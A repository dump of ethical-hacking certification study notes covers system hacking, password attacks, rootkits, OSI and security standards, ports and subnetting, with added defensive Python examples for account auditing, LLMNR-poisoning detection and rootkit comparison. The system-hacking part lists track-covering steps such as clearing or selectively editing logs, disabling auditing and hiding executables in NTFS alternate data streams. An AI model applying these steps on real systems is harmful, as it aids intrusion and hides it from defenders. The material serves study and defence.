70 | | -------- | ------------------------------------------------------------ |
71 | | adduser | Adds a user to the system |
72 | | cat | Displays contents of file |
73 | | cp | Copies |
74 | | ifconfig | Displays network configuration information |
75 | | kill | Kills a running process |
76 | | ls | Displays the contents of a folder. -l option provides most information. |
77 | | man | Displays the manual page for a command |
78 | | passwd | Used to change password |
79 | | ps | Process status. -ef option shows all processes |
80 | | rm | Removes files. -r option recursively removes all directories and subdirectories |
81 | | su | Allows you to perform functions as another user (super user) |
82 |
83 | - Adding an ampersand after a process name indicates it should run in the background.
84 | - **pwd** - displays current directory
85 | - **chmod** - changes the permissions of a folder or file
86 | - Read is 4, write is 2 and execute is 1
87 | - First number is user, second is group, third is others
88 | - Example - 755 is everything for users, read/execute for group, and read/execute for others
89 | - Root has UID and GID of 0
90 | - First user has UID and GID of 500
91 | - Passwords are stored in /etc/shadow for most current systems
92 | - /etc/passwd stores passwords in hashes.
93 | - /etc/shadow stores passwords encrypted (hashed and salted) and is only accessible by root
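An added Python example (not from the study guide or the book) that audits constructed /etc/passwd and /etc/shadow content for the points above: extra UID 0 accounts, hashes left in the world-readable passwd file, empty shadow fields, weak hash algorithms, and the chmod digit rule (read 4, write 2, execute 1) applied to the mode of /etc/shadow. The account lines, hash strings and the prefix table are assumptions of the example.

```python
from typing import Dict, List

# Constructed sample content (not copied from any real system).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
backup:x:0:0:backup:/var/backups:/bin/sh
alice:x:500:500:Alice:/home/alice:/bin/bash
legacy:$1$abcdefgh$0123456789ABCDEFGHIJK:501:501:Legacy:/home/legacy:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhashhashhashhash:19000:0:99999:7:::
backup:!:19000:0:99999:7:::
alice::19000:0:99999:7:::
"""

# crypt(3) identifiers; anything without one of these is DES-crypt or unknown
HASH_PREFIXES = {"$1$": "md5-crypt (weak)", "$5$": "sha256-crypt", "$6$": "sha512-crypt", "$y$": "yescrypt"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    fields = ["name", "password", "uid", "gid", "gecos", "home", "shell"]
    return [dict(zip(fields, line.split(":"))) for line in text.splitlines() if line.strip()]


def parse_shadow(text: str) -> Dict[str, str]:
    """Map account name to the hash field (second field) of each shadow line."""
    return {line.split(":")[0]: line.split(":")[1] for line in text.splitlines() if line.strip()}


def audit_accounts(passwd_text: str, shadow_text: str) -> List[str]:
    findings: List[str] = []
    shadow = parse_shadow(shadow_text)
    for acct in parse_passwd(passwd_text):
        name = acct["name"]
        if acct["uid"] == "0" and name != "root":
            findings.append(f"{name}: UID 0 (root-equivalent account)")
        if acct["password"] not in ("x", "*", "!"):
            findings.append(f"{name}: password hash kept in world-readable /etc/passwd")
        if name in shadow:
            h = shadow[name]
            if h == "":
                findings.append(f"{name}: empty shadow field, no password required")
            elif h[0] in "!*":
                continue  # locked or disabled account, nothing to crack
            else:
                algo = next((v for k, v in HASH_PREFIXES.items() if h.startswith(k)),
                            "DES-crypt or unknown (weak)")
                if "weak" in algo:
                    findings.append(f"{name}: {algo}")
    return findings


def mode_to_rwx(octal: str) -> str:
    """Expand a three-digit chmod mode into rwx form: '755' -> 'rwxr-xr-x' (user, group, others)."""
    out = ""
    for digit in octal[-3:]:
        bits = int(digit)
        out += ("r" if bits & 4 else "-") + ("w" if bits & 2 else "-") + ("x" if bits & 1 else "-")
    return out


def others_can_read(octal: str) -> bool:
    """/etc/shadow must not be readable by 'others' (third digit): '640' passes, '644' fails."""
    return bool(int(octal[-1]) & 4)
```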
94 |
95 | ### System Hacking Goals
96 |
97 | - **Gaining Access** - uses information gathered to exploit the system
98 | - **Escalating Privileges** - granting the account you've hacked admin rights, or pivoting to an admin account
99 | - **Executing Applications** - putting back doors into the system so that you can maintain access
100 | - **Hiding Files** - making sure the files you leave behind are not discoverable
101 | - **Covering Tracks** - cleaning up everything else (log files, etc.)
102 | - **clearev** - meterpreter shell command to clear log files
103 | - Clear MRU list in Windows
104 | - In Linux, append a dot in front of a file to hide it
105 |
106 | ### Authentication and Passwords
107 |
108 | - **Three Different Types**
109 | - **Something You Are** - uses biometrics to validate identity (retina, fingerprint, etc.)
110 | - Downside is there can be lots of false negatives
111 | - **False acceptance rate** (FAR) - rate that a system accepts access for people that shouldn't have it
112 | - **False rejection rate** (FRR) - rate that a system rejects access for someone who should have it
113 | - **Crossover error rate** (CER) - combination of the two; the lower the CER, the better the system
114 | - **Active** - requires interaction (retina scan or fingerprint scanner)
115 | - **Passive** - requires no interaction (iris scan)
116 | - **Something You Have** - usually consists of a token of some kind (swipe badge, ATM card, etc.)
117 | - This type usually requires something alongside it (such as a PIN for an ATM card)
118 | - Some tokens are single-factor (such as a plug-and-play authentication)
119 | - **Something You Know** - better known as a password
120 | - Most systems use this because it is universal and well-known
121 |
122 | - **Two-Factor** - when you have two types of authentication such as something you know (password) and something you have (access card)
123 |
124 | - **Strength of passwords** - determined by length and complexity
125 | - ECC says that both should be combined for the best outcome
126 | - Complexity is defined by number of character sets used (lower case, upper case, numbers, symbols, etc.)
127 | - **Default passwords** - always should be changed and never left what they came with. Databases such as cirt.net, default-password.info and open-sez.me all have databases of these
128 |
129 | ### Password Attacks
130 |
131 | - **Non-electronic** - social engineering attacks - most effective.
132 | - Includes shoulder surfing and dumpster diving
133 | - **Active online** - done by directly communicating with the victim's machine
134 | - Includes dictionary and brute-force attacks, hash injections, phishing, Trojans, spyware, keyloggers and password guessing
135 | - **Keylogging** - process of using a hardware device or software application to capture keystrokes of a user
136 | - **LLMNR/NBT-NS** - attack based on Windows name-resolution technologies that cache names locally. Answering these broadcast queries poisons the local cache. If an NTLM v2 hash is sent over, it can be sniffed out and then cracked
137 | - **Tools**
138 | - NBNSpoof
139 | - Pupy
140 | - Metasploit
141 | - Responder
142 | - LLMNR uses UDP 5355
143 | - NBT-NS uses UDP 137
144 | - Active online attacks are easier to detect and take a longer time
145 | - Can combine "net" commands with a tool such as **NetBIOS Auditing tool** or **Legion** to automate the testing of user IDs and passwords
146 | - **Tools**
147 | - Hydra
148 | - Metasploit
149 | - **Passive online** - sniffing the wire in hopes of intercepting a password in clear text or attempting a replay attack or man-in-the-middle attack
150 | - **Tools**
151 | - **Cain and Abel** - can poison ARP and then monitor the victim's traffic
152 | - **Ettercap** - works very similar to Cain and Abel. However, can also help against SSL encryption
153 | - **KerbCrack** - built-in sniffer and password cracker looking for port 88 Kerberos traffic
154 | - **ScoopLM** - specifically looks for Windows authentication traffic on the wire and has a password cracker
155 | - **Offline** - when the hacker steals a copy of the password file and does the cracking on a separate system
156 | - **Dictionary Attack** - uses a word list to attack the password. Fastest method of attacking
157 | - **Brute force attack** - tries every combination of characters to crack a password
158 | - Can be faster if you know parameters (such as at least 7 characters, should have a special character, etc.)
159 | - **Hybrid attack** - takes a dictionary attack and replaces characters (such as a 0 for an o) or adds numbers to the end
160 | - **Rainbow tables** - uses pre-hashed passwords to compare against a password hash. Is faster because the hashes are already computed.
161 | - **Tools**
162 | - Cain
163 | - KerbCrack
164 | - Legion
165 | - John the Ripper
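An added Python example (not from the study guide or the book) of detecting the LLMNR/NBT-NS poisoning described above from the defender's side: a legitimate host answers only for its own name, so a host that answers for many different names, or for a deliberately unregistered canary name, is poisoning. The event records, the IP addresses and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Set

LLMNR_PORT = 5355   # LLMNR runs over UDP 5355
NBTNS_PORT = 137    # NBT-NS runs over UDP 137

# Constructed sample events (not real traffic). Each record is one name-resolution
# response seen on the wire: who answered, on which protocol, for which name and
# with which address. 10.0.0.20 legitimately answers for its own name only, while
# 10.0.0.66 answers every query it sees, including names that do not exist.
SAMPLE_EVENTS = [
    {"src": "10.0.0.20", "port": LLMNR_PORT, "name": "FILESRV01", "answer": "10.0.0.20"},
    {"src": "10.0.0.66", "port": LLMNR_PORT, "name": "FILESRV01", "answer": "10.0.0.66"},
    {"src": "10.0.0.66", "port": LLMNR_PORT, "name": "wpad", "answer": "10.0.0.66"},
    {"src": "10.0.0.66", "port": NBTNS_PORT, "name": "FILESRV0l", "answer": "10.0.0.66"},
    {"src": "10.0.0.66", "port": NBTNS_PORT, "name": "HONEYPOT-NAME", "answer": "10.0.0.66"},
]


def detect_poisoners(events: Iterable[Dict[str, object]], min_distinct_names: int = 3) -> List[str]:
    """Return hosts that answer LLMNR/NBT-NS queries for many different names with themselves.

    A real host answers only for its own name(s); a poisoner answers for whatever
    is asked, because the goal is to receive the victim's NTLMv2 authentication.
    """
    names_answered: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        if e["port"] in (LLMNR_PORT, NBTNS_PORT) and e["answer"] == e["src"]:
            names_answered[str(e["src"])].add(str(e["name"]).upper())
    return sorted(src for src, names in names_answered.items() if len(names) >= min_distinct_names)


def canary_hits(events: Iterable[Dict[str, object]], canary_names: Iterable[str]) -> List[str]:
    """Hosts answering for a name that is deliberately never registered: any answer is poisoning."""
    wanted = {n.upper() for n in canary_names}
    return sorted({str(e["src"]) for e in events if str(e["name"]).upper() in wanted})
```

The lasting fix is to disable LLMNR (the "Turn off multicast name resolution" Group Policy setting) and NetBIOS over TCP/IP where they are not needed, so there is nothing to poison.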
166 |
167 | ### Privilege Escalation and Executing Applications
168 |
169 | - **Vertical** - lower-level user executes code at a higher privilege level
170 | - **Horizontal** - executing code at the same user level but from a location that would be protected from that access
171 | - **Four Methods**
172 | - Crack the password of an admin - primary aim
173 | - Take advantage of an OS vulnerability
174 | - **DLL Hijacking** - replacing a DLL in the application directory with your own version which gives you the access you need
175 | - Use a tool that will provide you the access such as Metasploit
176 | - Social engineering a user to run an application
177 | - ECC refers to executing applications as "owning" a system
178 | - **Executing applications** - starting things such as keyloggers, spyware, back doors and crackers
179 |
180 | ### Hiding Files and Covering Tracks
181 |
182 | - In Windows, **Alternate Data Stream** (ADS) can hide files
183 | - Hides a file from directory listing on an NTFS file system
184 | - readme.txt:badfile.exe
185 | - Can be run by start readme.txt:badfile.exe
186 | - You can also create a link to this and make it look real (e.g. mklink innocent.exe readme.txt:badfile.exe)
187 | - Every forensic kit looks for this, however
188 | - To show ADS, dir /r does the trick
189 | - You can also blow away all ADS by copying files to a FAT partition
190 | - You can also hide files by attributes
191 | - In Windows: attrib +h filename
192 | - In Linux, simply add a . to the beginning of the filename
193 | - Can hide data and files with steganography
194 | - Also need to worry about clearing logs
195 | - In Windows, you need to clear application, system and security logs
196 | - Don't just delete; key sign that an attack has happened
197 | - Option is to corrupt a log file - this happens all the time
198 | - Best option is be selective and delete the entries pertaining to your actions.
199 | - Can also disable auditing ahead of time to prevent logs from being captured
200 |
201 | ### Rootkits
202 |
203 | - Software put in place by attacker to obscure system compromise
204 | - Hides processes and files
205 | - Also allows for future access
206 | - **Examples**
207 | - Horsepill - Linux kernel rootkit inside initrd
208 | - Grayfish - Windows rootkit that injects in boot record
209 | - Firefef - multi-component family of malware
210 | - Azazel
211 | - Avatar
212 | - Necurs
213 | - ZeroAccess
214 | - **Hypervisor level** - rootkits that modify the boot sequence of a host system to load a VM as the host OS
215 | - **Hardware** - hide malware in devices or firmware
216 | - **Boot loader level** - replace boot loader with one controlled by hacker
217 | - **Application level** - directed to replace valid application files with Trojans
218 | - **Kernel level** - attack boot sectors and kernel level replacing kernel code with back-door code; most dangerous
219 | - **Library level** - use system-level calls to hide themselves
220 | - One way to detect rootkits is to map all the files on a system and then boot a system from a clean CD version and compare the two file systems
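An added Python example (not from the study guide or the book) of the detection method just described: hash every file once from the running system and once after booting clean media, then diff the two manifests. The demo directory, file names and contents are constructed; the "live" snapshot is taken before the hidden file and the trojaned binary are written, standing in for what a rootkit would mask.

```python
import hashlib
import os
import tempfile
from typing import Dict, Set


def build_manifest(root: str) -> Dict[str, str]:
    """Map every regular file under root (path relative to root, '/' separators) to its SHA-256."""
    manifest: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and device nodes are not hashed
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = digest.hexdigest()
    return manifest


def compare_manifests(live: Dict[str, str], clean: Dict[str, str]) -> Dict[str, Set[str]]:
    """Diff the manifest taken on the running system against the one taken after a clean boot.

    hidden_from_live: on disk but not visible while the suspect kernel was running
    only_in_live:     visible live but gone when booted clean (e.g. a rootkit's fake view)
    modified:         same path, different contents (e.g. a hooked read masking a trojaned binary)
    """
    live_paths, clean_paths = set(live), set(clean)
    return {
        "hidden_from_live": clean_paths - live_paths,
        "only_in_live": live_paths - clean_paths,
        "modified": {p for p in live_paths & clean_paths if live[p] != clean[p]},
    }


def run_demo() -> Dict[str, Set[str]]:
    """Constructed walk-through in a temporary directory: snapshot, then reveal what a clean boot sees."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as fh:
            fh.write(b"original ls binary")
        live = build_manifest(root)  # taken while the (hypothetical) rootkit is active
        # Booting from clean media exposes what the rootkit was hiding or masking:
        with open(os.path.join(root, "bin", ".rk.ko"), "wb") as fh:
            fh.write(b"hidden kernel module")
        with open(os.path.join(root, "bin", "ls"), "wb") as fh:
            fh.write(b"trojaned ls binary")
        clean = build_manifest(root)
        return compare_manifests(live, clean)
```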
--------------------------------------------------------------------------------
/1 - Essential Knowledge.md:
--------------------------------------------------------------------------------
1 | # Essential Knowledge
2 |
3 | ### The OSI Reference Model
4 |
5 | | Layer | Description | Technologies | Data Unit |
6 | | ----- | ------------ | --------------- | --------- |
7 | | 1 | Physical | USB, Bluetooth | Bit |
8 | | 2 | Data Link | ARP, PPP | Frame |
9 | | 3 | Network | IP | Packet |
10 | | 4 | Transport | TCP | Segment |
11 | | 5 | Session | X.225, SCP | Data |
12 | | 6 | Presentation | AFP, MIME | Data |
13 | | 7 | Application | FTP, HTTP, SMTP | Data |
14 |
15 | ### TCP/IP Model
16 |
17 | | Layer | Description | OSI Layer Equivalent |
18 | | ----- | -------------- | -------------------- |
19 | | 1 | Network Access | 1, 2 |
20 | | 2 | Internet | 3 |
21 | | 3 | Transport | 4 |
22 | | 4 | Application | 5-7 |
23 |
24 | ### TCP Handshake
25 |
26 | SYN -> SYN-ACK -> ACK
27 |
28 | ### ARP
29 |
30 | - Resolves IP address to physical address
31 |
32 | ### Network Security Zones
33 |
34 | - **Internet** - uncontrollable
35 | - **Internet DMZ** - controlled buffer network
36 | - **Production Network Zone** - very restricted; controls direct access from uncontrolled zones; has no users
37 | - **Intranet Zone** - controlled; has little to no heavy restrictions
38 | - **Management Network Zone** - might find VLANs and IPSEC; highly secured; strict policies
39 |
40 | ### Vulnerabilities
41 |
42 | - **Common Vulnerability Scoring System** (CVSS) - places numerical score based on severity
43 | - **National Vulnerability Database** (NVD) - US government repository of vulnerabilities
44 |
45 | ### Vulnerability Categories
46 |
47 | - **Misconfiguration** - improperly configuring a service or application
48 | - **Default installation** - failure to change settings in an application that come by default
49 | - **Buffer overflow** - code execution flaw
50 | - **Missing patches** - systems that have not been patched
51 | - **Design flaws** - flaws inherent to system design such as encryption and data validation
52 | - **Operating System Flaws** - flaws specific to each OS
53 | - **Default passwords** - leaving default passwords that come with system/application
54 |
55 | ### Vulnerability Management Tools
56 |
57 | - Nessus
58 | - Qualys
59 | - GFI Languard
60 | - Nikto
61 | - OpenVAS
62 | - Retina CS
63 |
64 | ### Terms to Know
65 |
66 | - **Hack value** - perceived value or worth of a target as seen by the attacker
67 | - **Zero-day attack** - attack that occurs before a vendor knows or is able to patch a flaw
68 | - **Doxing** - searching for and publishing information about an individual usually with a malicious intent
69 | - **Enterprise Information Security Architecture** (EISA) - process that determines how systems work within an organization
70 | - **Incident management** - deals with specific incidents to mitigate the attack
71 |
72 | ### Threat Modeling
73 |
74 | - Identify security objectives
75 | - Application Overview
76 | - Decompose application
77 | - Identify threats
78 | - Identify vulnerabilities
79 |
80 | ### Risk Management
81 |
82 | - Risk identification
83 | - Risk assessment
84 | - Risk treatment
85 | - Risk tracking
86 | - Risk review
87 |
88 | *Uses a risk analysis matrix to determine threat level*
89 |
90 | ### Types of Security Controls
91 |
92 | | Description | Examples |
93 | | -------------- | --------------------------------------------- |
94 | | Physical | Guards, lights, cameras |
95 | | Technical | Encryption, smart cards, access control lists |
96 | | Administrative | Training awareness, policies |
97 |
98 | | Description | Examples |
99 | | ------------ | --------------------------- |
100 | | Preventative | authentication, alarm bells |
101 | | Detective | audits, backups |
102 | | Corrective | restore operations |
103 |
104 | ### Business Analysis
105 |
106 | - Business Impact Analysis (BIA)
107 |
108 | - Maximum Tolerable Downtime (MTD)
109 |
110 | - Business Continuity Plan (BCP)
111 |
112 | - Disaster Recovery Plan (DRP)
113 |
114 | - Annualized Loss Expectancy (ALE)
115 |
116 | - Annual Rate of Occurrence (ARO)
117 |
118 | - Single Loss Expectancy (SLE)
119 | $$
120 | ALE = SLE \times ARO
121 | $$
122 |
123 | **User Behavior Analysis** (UBA) - tracking users and extrapolating data in light of malicious activity
124 |
125 | ### CIA Triad
126 |
127 | - **Confidentiality** - passwords, encryption
128 | - **Integrity** - hashing, digital signatures
129 | - **Availability** - anti-DoS solutions
130 |
131 | **Bit flipping** is an example of an integrity attack. The outcome is not to gain information - it is to obscure the data from the actual user.
132 |
133 | Confidentiality != authentication - MAC address spoofing is an authentication attack
134 |
135 | ### Common Criteria for Information Technology Security Evaluation
136 |
137 | - Routinely called "Common Criteria" (CC)
138 | - **Evaluation Assurance Level** (EAL) - goes from level 1 - 7
139 | - **Target of Evaluation** (TOE) - the system that is being tested
140 | - **Security Target** (ST) - document describing the TOE and security requirements
141 | - **Protection Profile** (PP) - security requirements that are specific to the type of device being tested
142 |
143 | ### Access Control Types
144 |
145 | - **Mandatory** (MAC) - access is set by an administrator
146 | - **Discretionary** (DAC) - allows users to give access to resources that they own and control
147 |
148 | ### Security Policies
149 |
150 | - **Access Control** - what resources are protected and who can access them
151 | - **Information Security** - what can systems be used for
152 | - **Information Protection** - defines data sensitivity levels
153 | - **Password** - all things about passwords (how long, characters required, etc.)
154 | - **E-Mail** - proper and allowable use of email systems
155 | - **Information Audit** - defines the framework used for auditing
156 |
157 | ### Policy Categorizations
158 |
159 | - **Promiscuous** - wide open
160 | - **Permissive** - blocks only known dangerous things
161 | - **Prudent** - blocks most and only allows things for business purposes
162 | - **Paranoid** - locks everything down
163 |
164 | **Standards** - mandatory rules to achieve consistency
165 |
166 | **Baselines** - provide the minimum security necessary
167 |
168 | **Guidelines** - flexible or recommended actions
169 |
170 | **Procedures** - step by step instructions
171 |
172 | **Script Kiddie** - uneducated in security methods, but uses tools that are freely available to perform malicious activities
173 |
174 | **Phreaker** - manipulates telephone systems
175 |
176 | ### The Hats
177 |
178 | - **White Hat** - ethical hackers
179 | - **Black Hat** - hackers that seek to perform malicious activities
180 | - **Gray Hat** - hackers that perform good or bad activities but do not have the permission of the organization they are hacking against
181 |
182 | **Hacktivist** - someone who hacks for a cause
183 |
184 | **Suicide Hackers** - do not care about any consequences to themselves; hack to get the job done
185 |
186 | **Cyberterrorist** - motivated by religious or political beliefs to create fear or disruption
187 |
188 | **State-Sponsored Hacker** - hacker that is hired by a government
189 |
190 | ### Attack Types
191 |
192 | - **Operating System** (OS) - attacks targeting OS flaws or security issues inside such as guest accounts or default passwords
193 | - **Application Level** - attacks on programming code and software logic
194 | - **Shrink-Wrap Code** - attack takes advantage of built-in code or scripts
195 | - **Misconfiguration** - attack takes advantage of systems that are misconfigured due to improper configuration or default configuration
196 |
197 | **Infowar** - the use of offensive and defensive techniques to create an advantage
198 |
199 | ### Hacking Phases
200 |
201 | 1. **Reconnaissance** - gathering evidence about targets
202 | 2. **Scanning & Enumeration** - obtaining more in-depth information about targets
203 | 3. **Gaining Access** - attacks are leveled in order to gain access to a system
204 | 4. **Maintaining Access** - items put in place to ensure future access
205 | 5. **Covering Tracks** - steps taken to conceal success and intrusion
206 |
207 | ### Types of Reconnaissance
208 |
209 | - **Passive** - gathering information about the target without their knowledge
210 | - **Active** - uses tools and techniques that may or may not be discovered
211 |
212 | ### Security Incident and Event Management (SIEM)
213 |
214 | - Functions related to a security operations center (SOC)
215 | - Identifying
216 | - Monitoring
217 | - Recording
218 | - Auditing
219 | - Analyzing
220 |
221 | **Ethical hacker** - employs tools that hackers use with a customer's permission; always obtains an agreement from the client with specific objectives before any testing is done
222 |
223 | **Cracker** - uses tools for personal gain or destructive purposes
224 |
225 | ### Penetration Test
226 |
227 | - Clearly defined, full scale test of security controls
228 | - Phases
229 | - **Preparation** - contracts and team determined
230 | - **Assessment** - all hacking phases (reconnaissance, scanning, attacks, etc.)
231 | - **Post-Assessment** - reports & conclusions
232 | - Types
233 | - **Black Box** - done without any knowledge of the system or network
234 | - **White Box** - complete knowledge of the system
235 | - **Gray Box** - has some knowledge of the system and/or network
236 |
237 | ### Law Categories
238 |
239 | - **Criminal** - laws that protect public safety and usually have jail time attached
240 | - **Civil** - private rights and remedies
241 | - **Common** - laws that are based on societal customs
242 |
244 | ### Laws and Standards
245 |
246 | - **OSSTMM Compliance** - "Open Source Security Testing Methodology Manual" maintained by ISECOM, defines three types of compliance
247 | - **Legislative** - deals with government regulations (such as SOX and HIPAA)
248 | - **Contractual** - deals with industry / group requirements (such as PCI DSS)
249 | - **Standards based** - deals with practices that must be followed by members of a given group/organization (such as ITIL, ISO and OSSTMM itself)
250 |
251 | - **OSSTMM Controls**
252 | - **OSSTMM Class A - Interactive Controls**
253 | - *Authentication* - Provides for identification and authorization based on credentials
254 | - *Indemnification* - Provides contractual protection against loss or damages
255 | - *Subjugation* - Ensures that interactions occur according to processes defined by the asset owner
256 | - *Continuity* - Maintains interactivity with assets if corruption or failure occurs
257 | - *Resilience* - Protects assets from corruption and failure
258 |
261 | - **OSSTMM Class B - Process Controls**
262 | - *Non-repudiation* - Prevents participants from denying their actions
263 | - *Confidentiality* - Ensures that only participants know of an asset
264 | - *Privacy* - Ensures that only participants have access to the asset
265 | - *Integrity* - Ensures that only participants know when assets and processes change
266 | - *Alarm* - Notifies participants when interactions occur
267 |
268 | - **ISO 27001** - Security standard based on the British BS7799 standard, focuses on security governance
269 |
270 | - **NIST-800-53** - Catalogs security and privacy controls for federal information systems, created to help implementation of FISMA
271 |
272 | - **ISO 27002 AND 17799** - Based on BS7799 but focuses on security objectives and provides security controls based on industry best practice
273 |
274 | - **FISMA** - "Federal Information Security Modernization Act of 2002" A law updated in 2004 to codify the authority of the Department of Homeland Security with regard to implementation of information security policies
275 |
276 | - **FITARA** - "Federal Information Technology Acquisition Reform Act" A 2013 bill that was intended to change the framework that determines how the US GOV purchases technology
277 |
278 | - **HIPAA** - "Health Insurance Portability and Accountability Act" A law that sets privacy standards to protect patient medical records and health information shared between doctors, hospitals and insurance providers
279 |
280 | - **PCI-DSS** - "Payment Card Industry Data Security Standard" Standard for organizations handling Credit Cards, ATM cards and other POS cards
281 |
282 | - **COBIT** - "Control Objectives for Information and Related Technology" IT Governance framework and toolset, created by ISACA and ITGI
283 |
284 | - **SOX** - "Sarbanes-Oxley Act" Law that requires publicly traded companies to submit to independent audits and to properly disclose financial information
285 |
286 | - **GLBA** - "U.S. Gramm-Leach-Bliley Act" Law that protects the confidentiality and integrity of personal information that is collected by financial institutions.
287 |
288 | - **CSIRT** - "Computer Security Incident Response Team" A CSIRT provides a single point of contact when reporting computer security incidents
289 |
290 | - **ITIL** - "Information Technology Infrastructure Library" - An operational framework developed in the '80s that standardizes IT management procedures
291 |
292 | ### Controls
293 |
294 | - **Directive** - Also known as procedural controls because they deal with company procedures such as security policies, operations plans, and guidelines.
295 | - **Deterrent** - Controls that are used to dissuade potential attackers, such as signs that warn possible attackers about the alarm system and monitoring in place.
296 | - **Preventive** - Controls used to stop potential attacks by preventing users from performing specific actions, such as encryption and authentication
297 | - **Compensating** - Controls used to supplement directive controls, such as administrator reviewing logs files for violations of company policy
298 | - **Detective** - Controls used to monitor and alert on malicious or unauthorized activity, such as IDSs and CCTV feeds monitored in real time
299 | - **Corrective** - Controls used to repair damage caused by malicious events, such as antivirus software and IPS (IPS being both a detective and corrective control)
300 | - **Recovery**
301 |
--------------------------------------------------------------------------------
/3 - Scanning and Enumeration.md:
--------------------------------------------------------------------------------
1 | # Scanning and Enumeration
2 |
3 | **Scanning** - discovering systems on the network and looking at what ports are open as well as applications that may be running
4 |
5 | **Connectionless Communication** - UDP packets are sent without creating a connection. Examples are TFTP, DNS (lookups only) and DHCP
6 |
7 | **Connection-Oriented Communication** - TCP packets require a connection due to the size of the data being transmitted and to ensure deliverability
8 |
9 | ### TCP Flags
10 |
11 | | Flag | Name | Function |
12 | | ---- | -------------- | ------------------------------------------------------------ |
13 | | SYN | Synchronize | Set during initial communication. Negotiating of parameters and sequence numbers |
14 | | ACK | Acknowledgment | Set as an acknowledgement to the SYN flag. Always set after initial SYN |
15 | | RST | Reset | Forces the termination of a connection (in both directions) |
16 | | FIN | Finish | Ordered close to communications |
17 | | PSH | Push | Forces the delivery of data without concern for buffering |
18 | | URG | Urgent | Data inside is being sent out of band. Example is cancelling a message |
19 |
20 | ### TCP Handshake
21 |
22 | - SYN -> SYN-ACK -> ACK
23 | - Sequence numbers increase on new communication. Example is computers A and B. A would increment B's sequence number. A would never increment its own sequence.
24 |
25 | ### Port Numbers
26 |
27 | - **Internet Assigned Numbers Authority** (IANA) - maintains Service Name and Transport Protocol Port Number Registry which lists all port number reservations
28 |
29 | - Ranges
30 |
31 | - **Well-known ports** - 0 - 1023
32 |
33 | - **Registered ports** - 1024 - 49,151
34 |
35 | - **Dynamic ports** - 49,152 - 65,535
36 |
37 | | Port Number | Protocol | Transport Protocol |
38 | | ----------- | -------- | ------------------ |
39 | | 20/21 | FTP | TCP |
40 | | 22 | SSH | TCP |
41 | | 23 | Telnet | TCP |
42 | | 25 | SMTP | TCP |
43 | | 53 | DNS | TCP/UDP |
44 | | 67 | DHCP | UDP |
45 | | 69 | TFTP | UDP |
46 | | 80 | HTTP | TCP |
47 | | 110 | POP3 | TCP |
48 | | 135 | RPC | TCP |
49 | | 137-139 | NetBIOS | TCP/UDP |
50 | | 143 | IMAP | TCP |
51 | | 161/162 | SNMP | UDP |
52 | | 389 | LDAP | TCP/UDP |
53 | | 443 | HTTPS | TCP |
54 | | 445 | SMB | TCP |
55 | | 514 | SYSLOG | UDP |
56 |
57 | - A service is said to be **listening** on a port when it has that specific port open
58 |
59 | - Once a service has made a connection, the port is in an **established** state
60 |
61 | - Netstat
62 |
63 | - Shows open ports on computer
64 | - **netstat -an** displays connections in numerical form
65 | - **netstat -b** displays executables tied to the open port (admin only)
66 |
67 | ### Subnetting
68 |
69 | - **IPv4 Main Address Types**
70 | - **Unicast** - acted on by a single recipient
71 | - **Multicast** - acted on by members of a specific group
72 | - **Broadcast** - acted on by everyone on the network
73 | - **Limited** - delivered to every system on the local segment (255.255.255.255); routers never forward it
74 | - **Directed** - delivered to all devices on a specific subnet, addressed to that subnet's broadcast address
75 | - **Subnet mask** - splits the address into network bits and host bits, which determines how many addresses are available on a specific subnet
76 | - Represented by three methods
77 | - **Decimal** - 255.240.0.0
78 | - **Binary** - 11111111.11110000.00000000.00000000
79 | - **CIDR** - x.x.x.x/12 (where x.x.x.x is an IP address in that range and /12 is the number of network bits, i.e. the mask 255.240.0.0)
80 | - If all the bits in the host field are 1s, the address is the broadcast address
81 | - If they are all 0s, it's the network address
82 | - Any other combination indicates a host address in the range
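
A CIDR calculator, as an added example (not from the study guide) that applies the rules above: the mask is derived from the prefix length, host bits all 0 give the network address, host bits all 1 give the directed broadcast, and the limited broadcast 255.255.255.255 is handled as a special case. The addresses used are illustrative only.

```python
import socket
import struct


def ip_to_int(ip):
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def int_to_ip(n):
    return socket.inet_ntoa(struct.pack("!I", n & 0xFFFFFFFF))


def to_binary(n):
    """Dotted binary form of a 32-bit value, e.g. 11111111.11110000.00000000.00000000."""
    return ".".join(f"{b:08b}" for b in struct.pack("!I", n))


def subnet_info(cidr):
    """Network, directed broadcast, mask in all three notations and usable host count for address/prefix."""
    ip, prefix = cidr.split("/")
    prefix = int(prefix)
    if not 0 <= prefix <= 32:
        raise ValueError(f"bad prefix length {prefix}")
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF   # prefix ones followed by host zeros
    addr = ip_to_int(ip)
    network = addr & mask                                  # host bits all 0
    broadcast = network | (~mask & 0xFFFFFFFF)             # host bits all 1
    host_bits = 32 - prefix
    # /31 (RFC 3021) and /32 have no separate network/broadcast addresses
    usable = 2 ** host_bits - 2 if host_bits >= 2 else 2 ** host_bits
    return {"network": int_to_ip(network), "broadcast": int_to_ip(broadcast),
            "mask_decimal": int_to_ip(mask), "mask_binary": to_binary(mask),
            "cidr": f"{int_to_ip(network)}/{prefix}", "usable_hosts": usable,
            "first_host": int_to_ip(network + 1) if host_bits >= 2 else int_to_ip(network),
            "last_host": int_to_ip(broadcast - 1) if host_bits >= 2 else int_to_ip(broadcast)}


def classify(ip, cidr):
    """Say what role an address plays relative to a subnet."""
    if ip == "255.255.255.255":
        return "limited broadcast"
    info = subnet_info(cidr)
    if ip == info["network"]:
        return "network address"
    if ip == info["broadcast"]:
        return "directed broadcast"
    if ip_to_int(info["network"]) < ip_to_int(ip) < ip_to_int(info["broadcast"]):
        return "host address"
    return "outside subnet"


if __name__ == "__main__":
    for key, value in subnet_info("172.20.33.7/12").items():
        print(f"{key:>13}: {value}")
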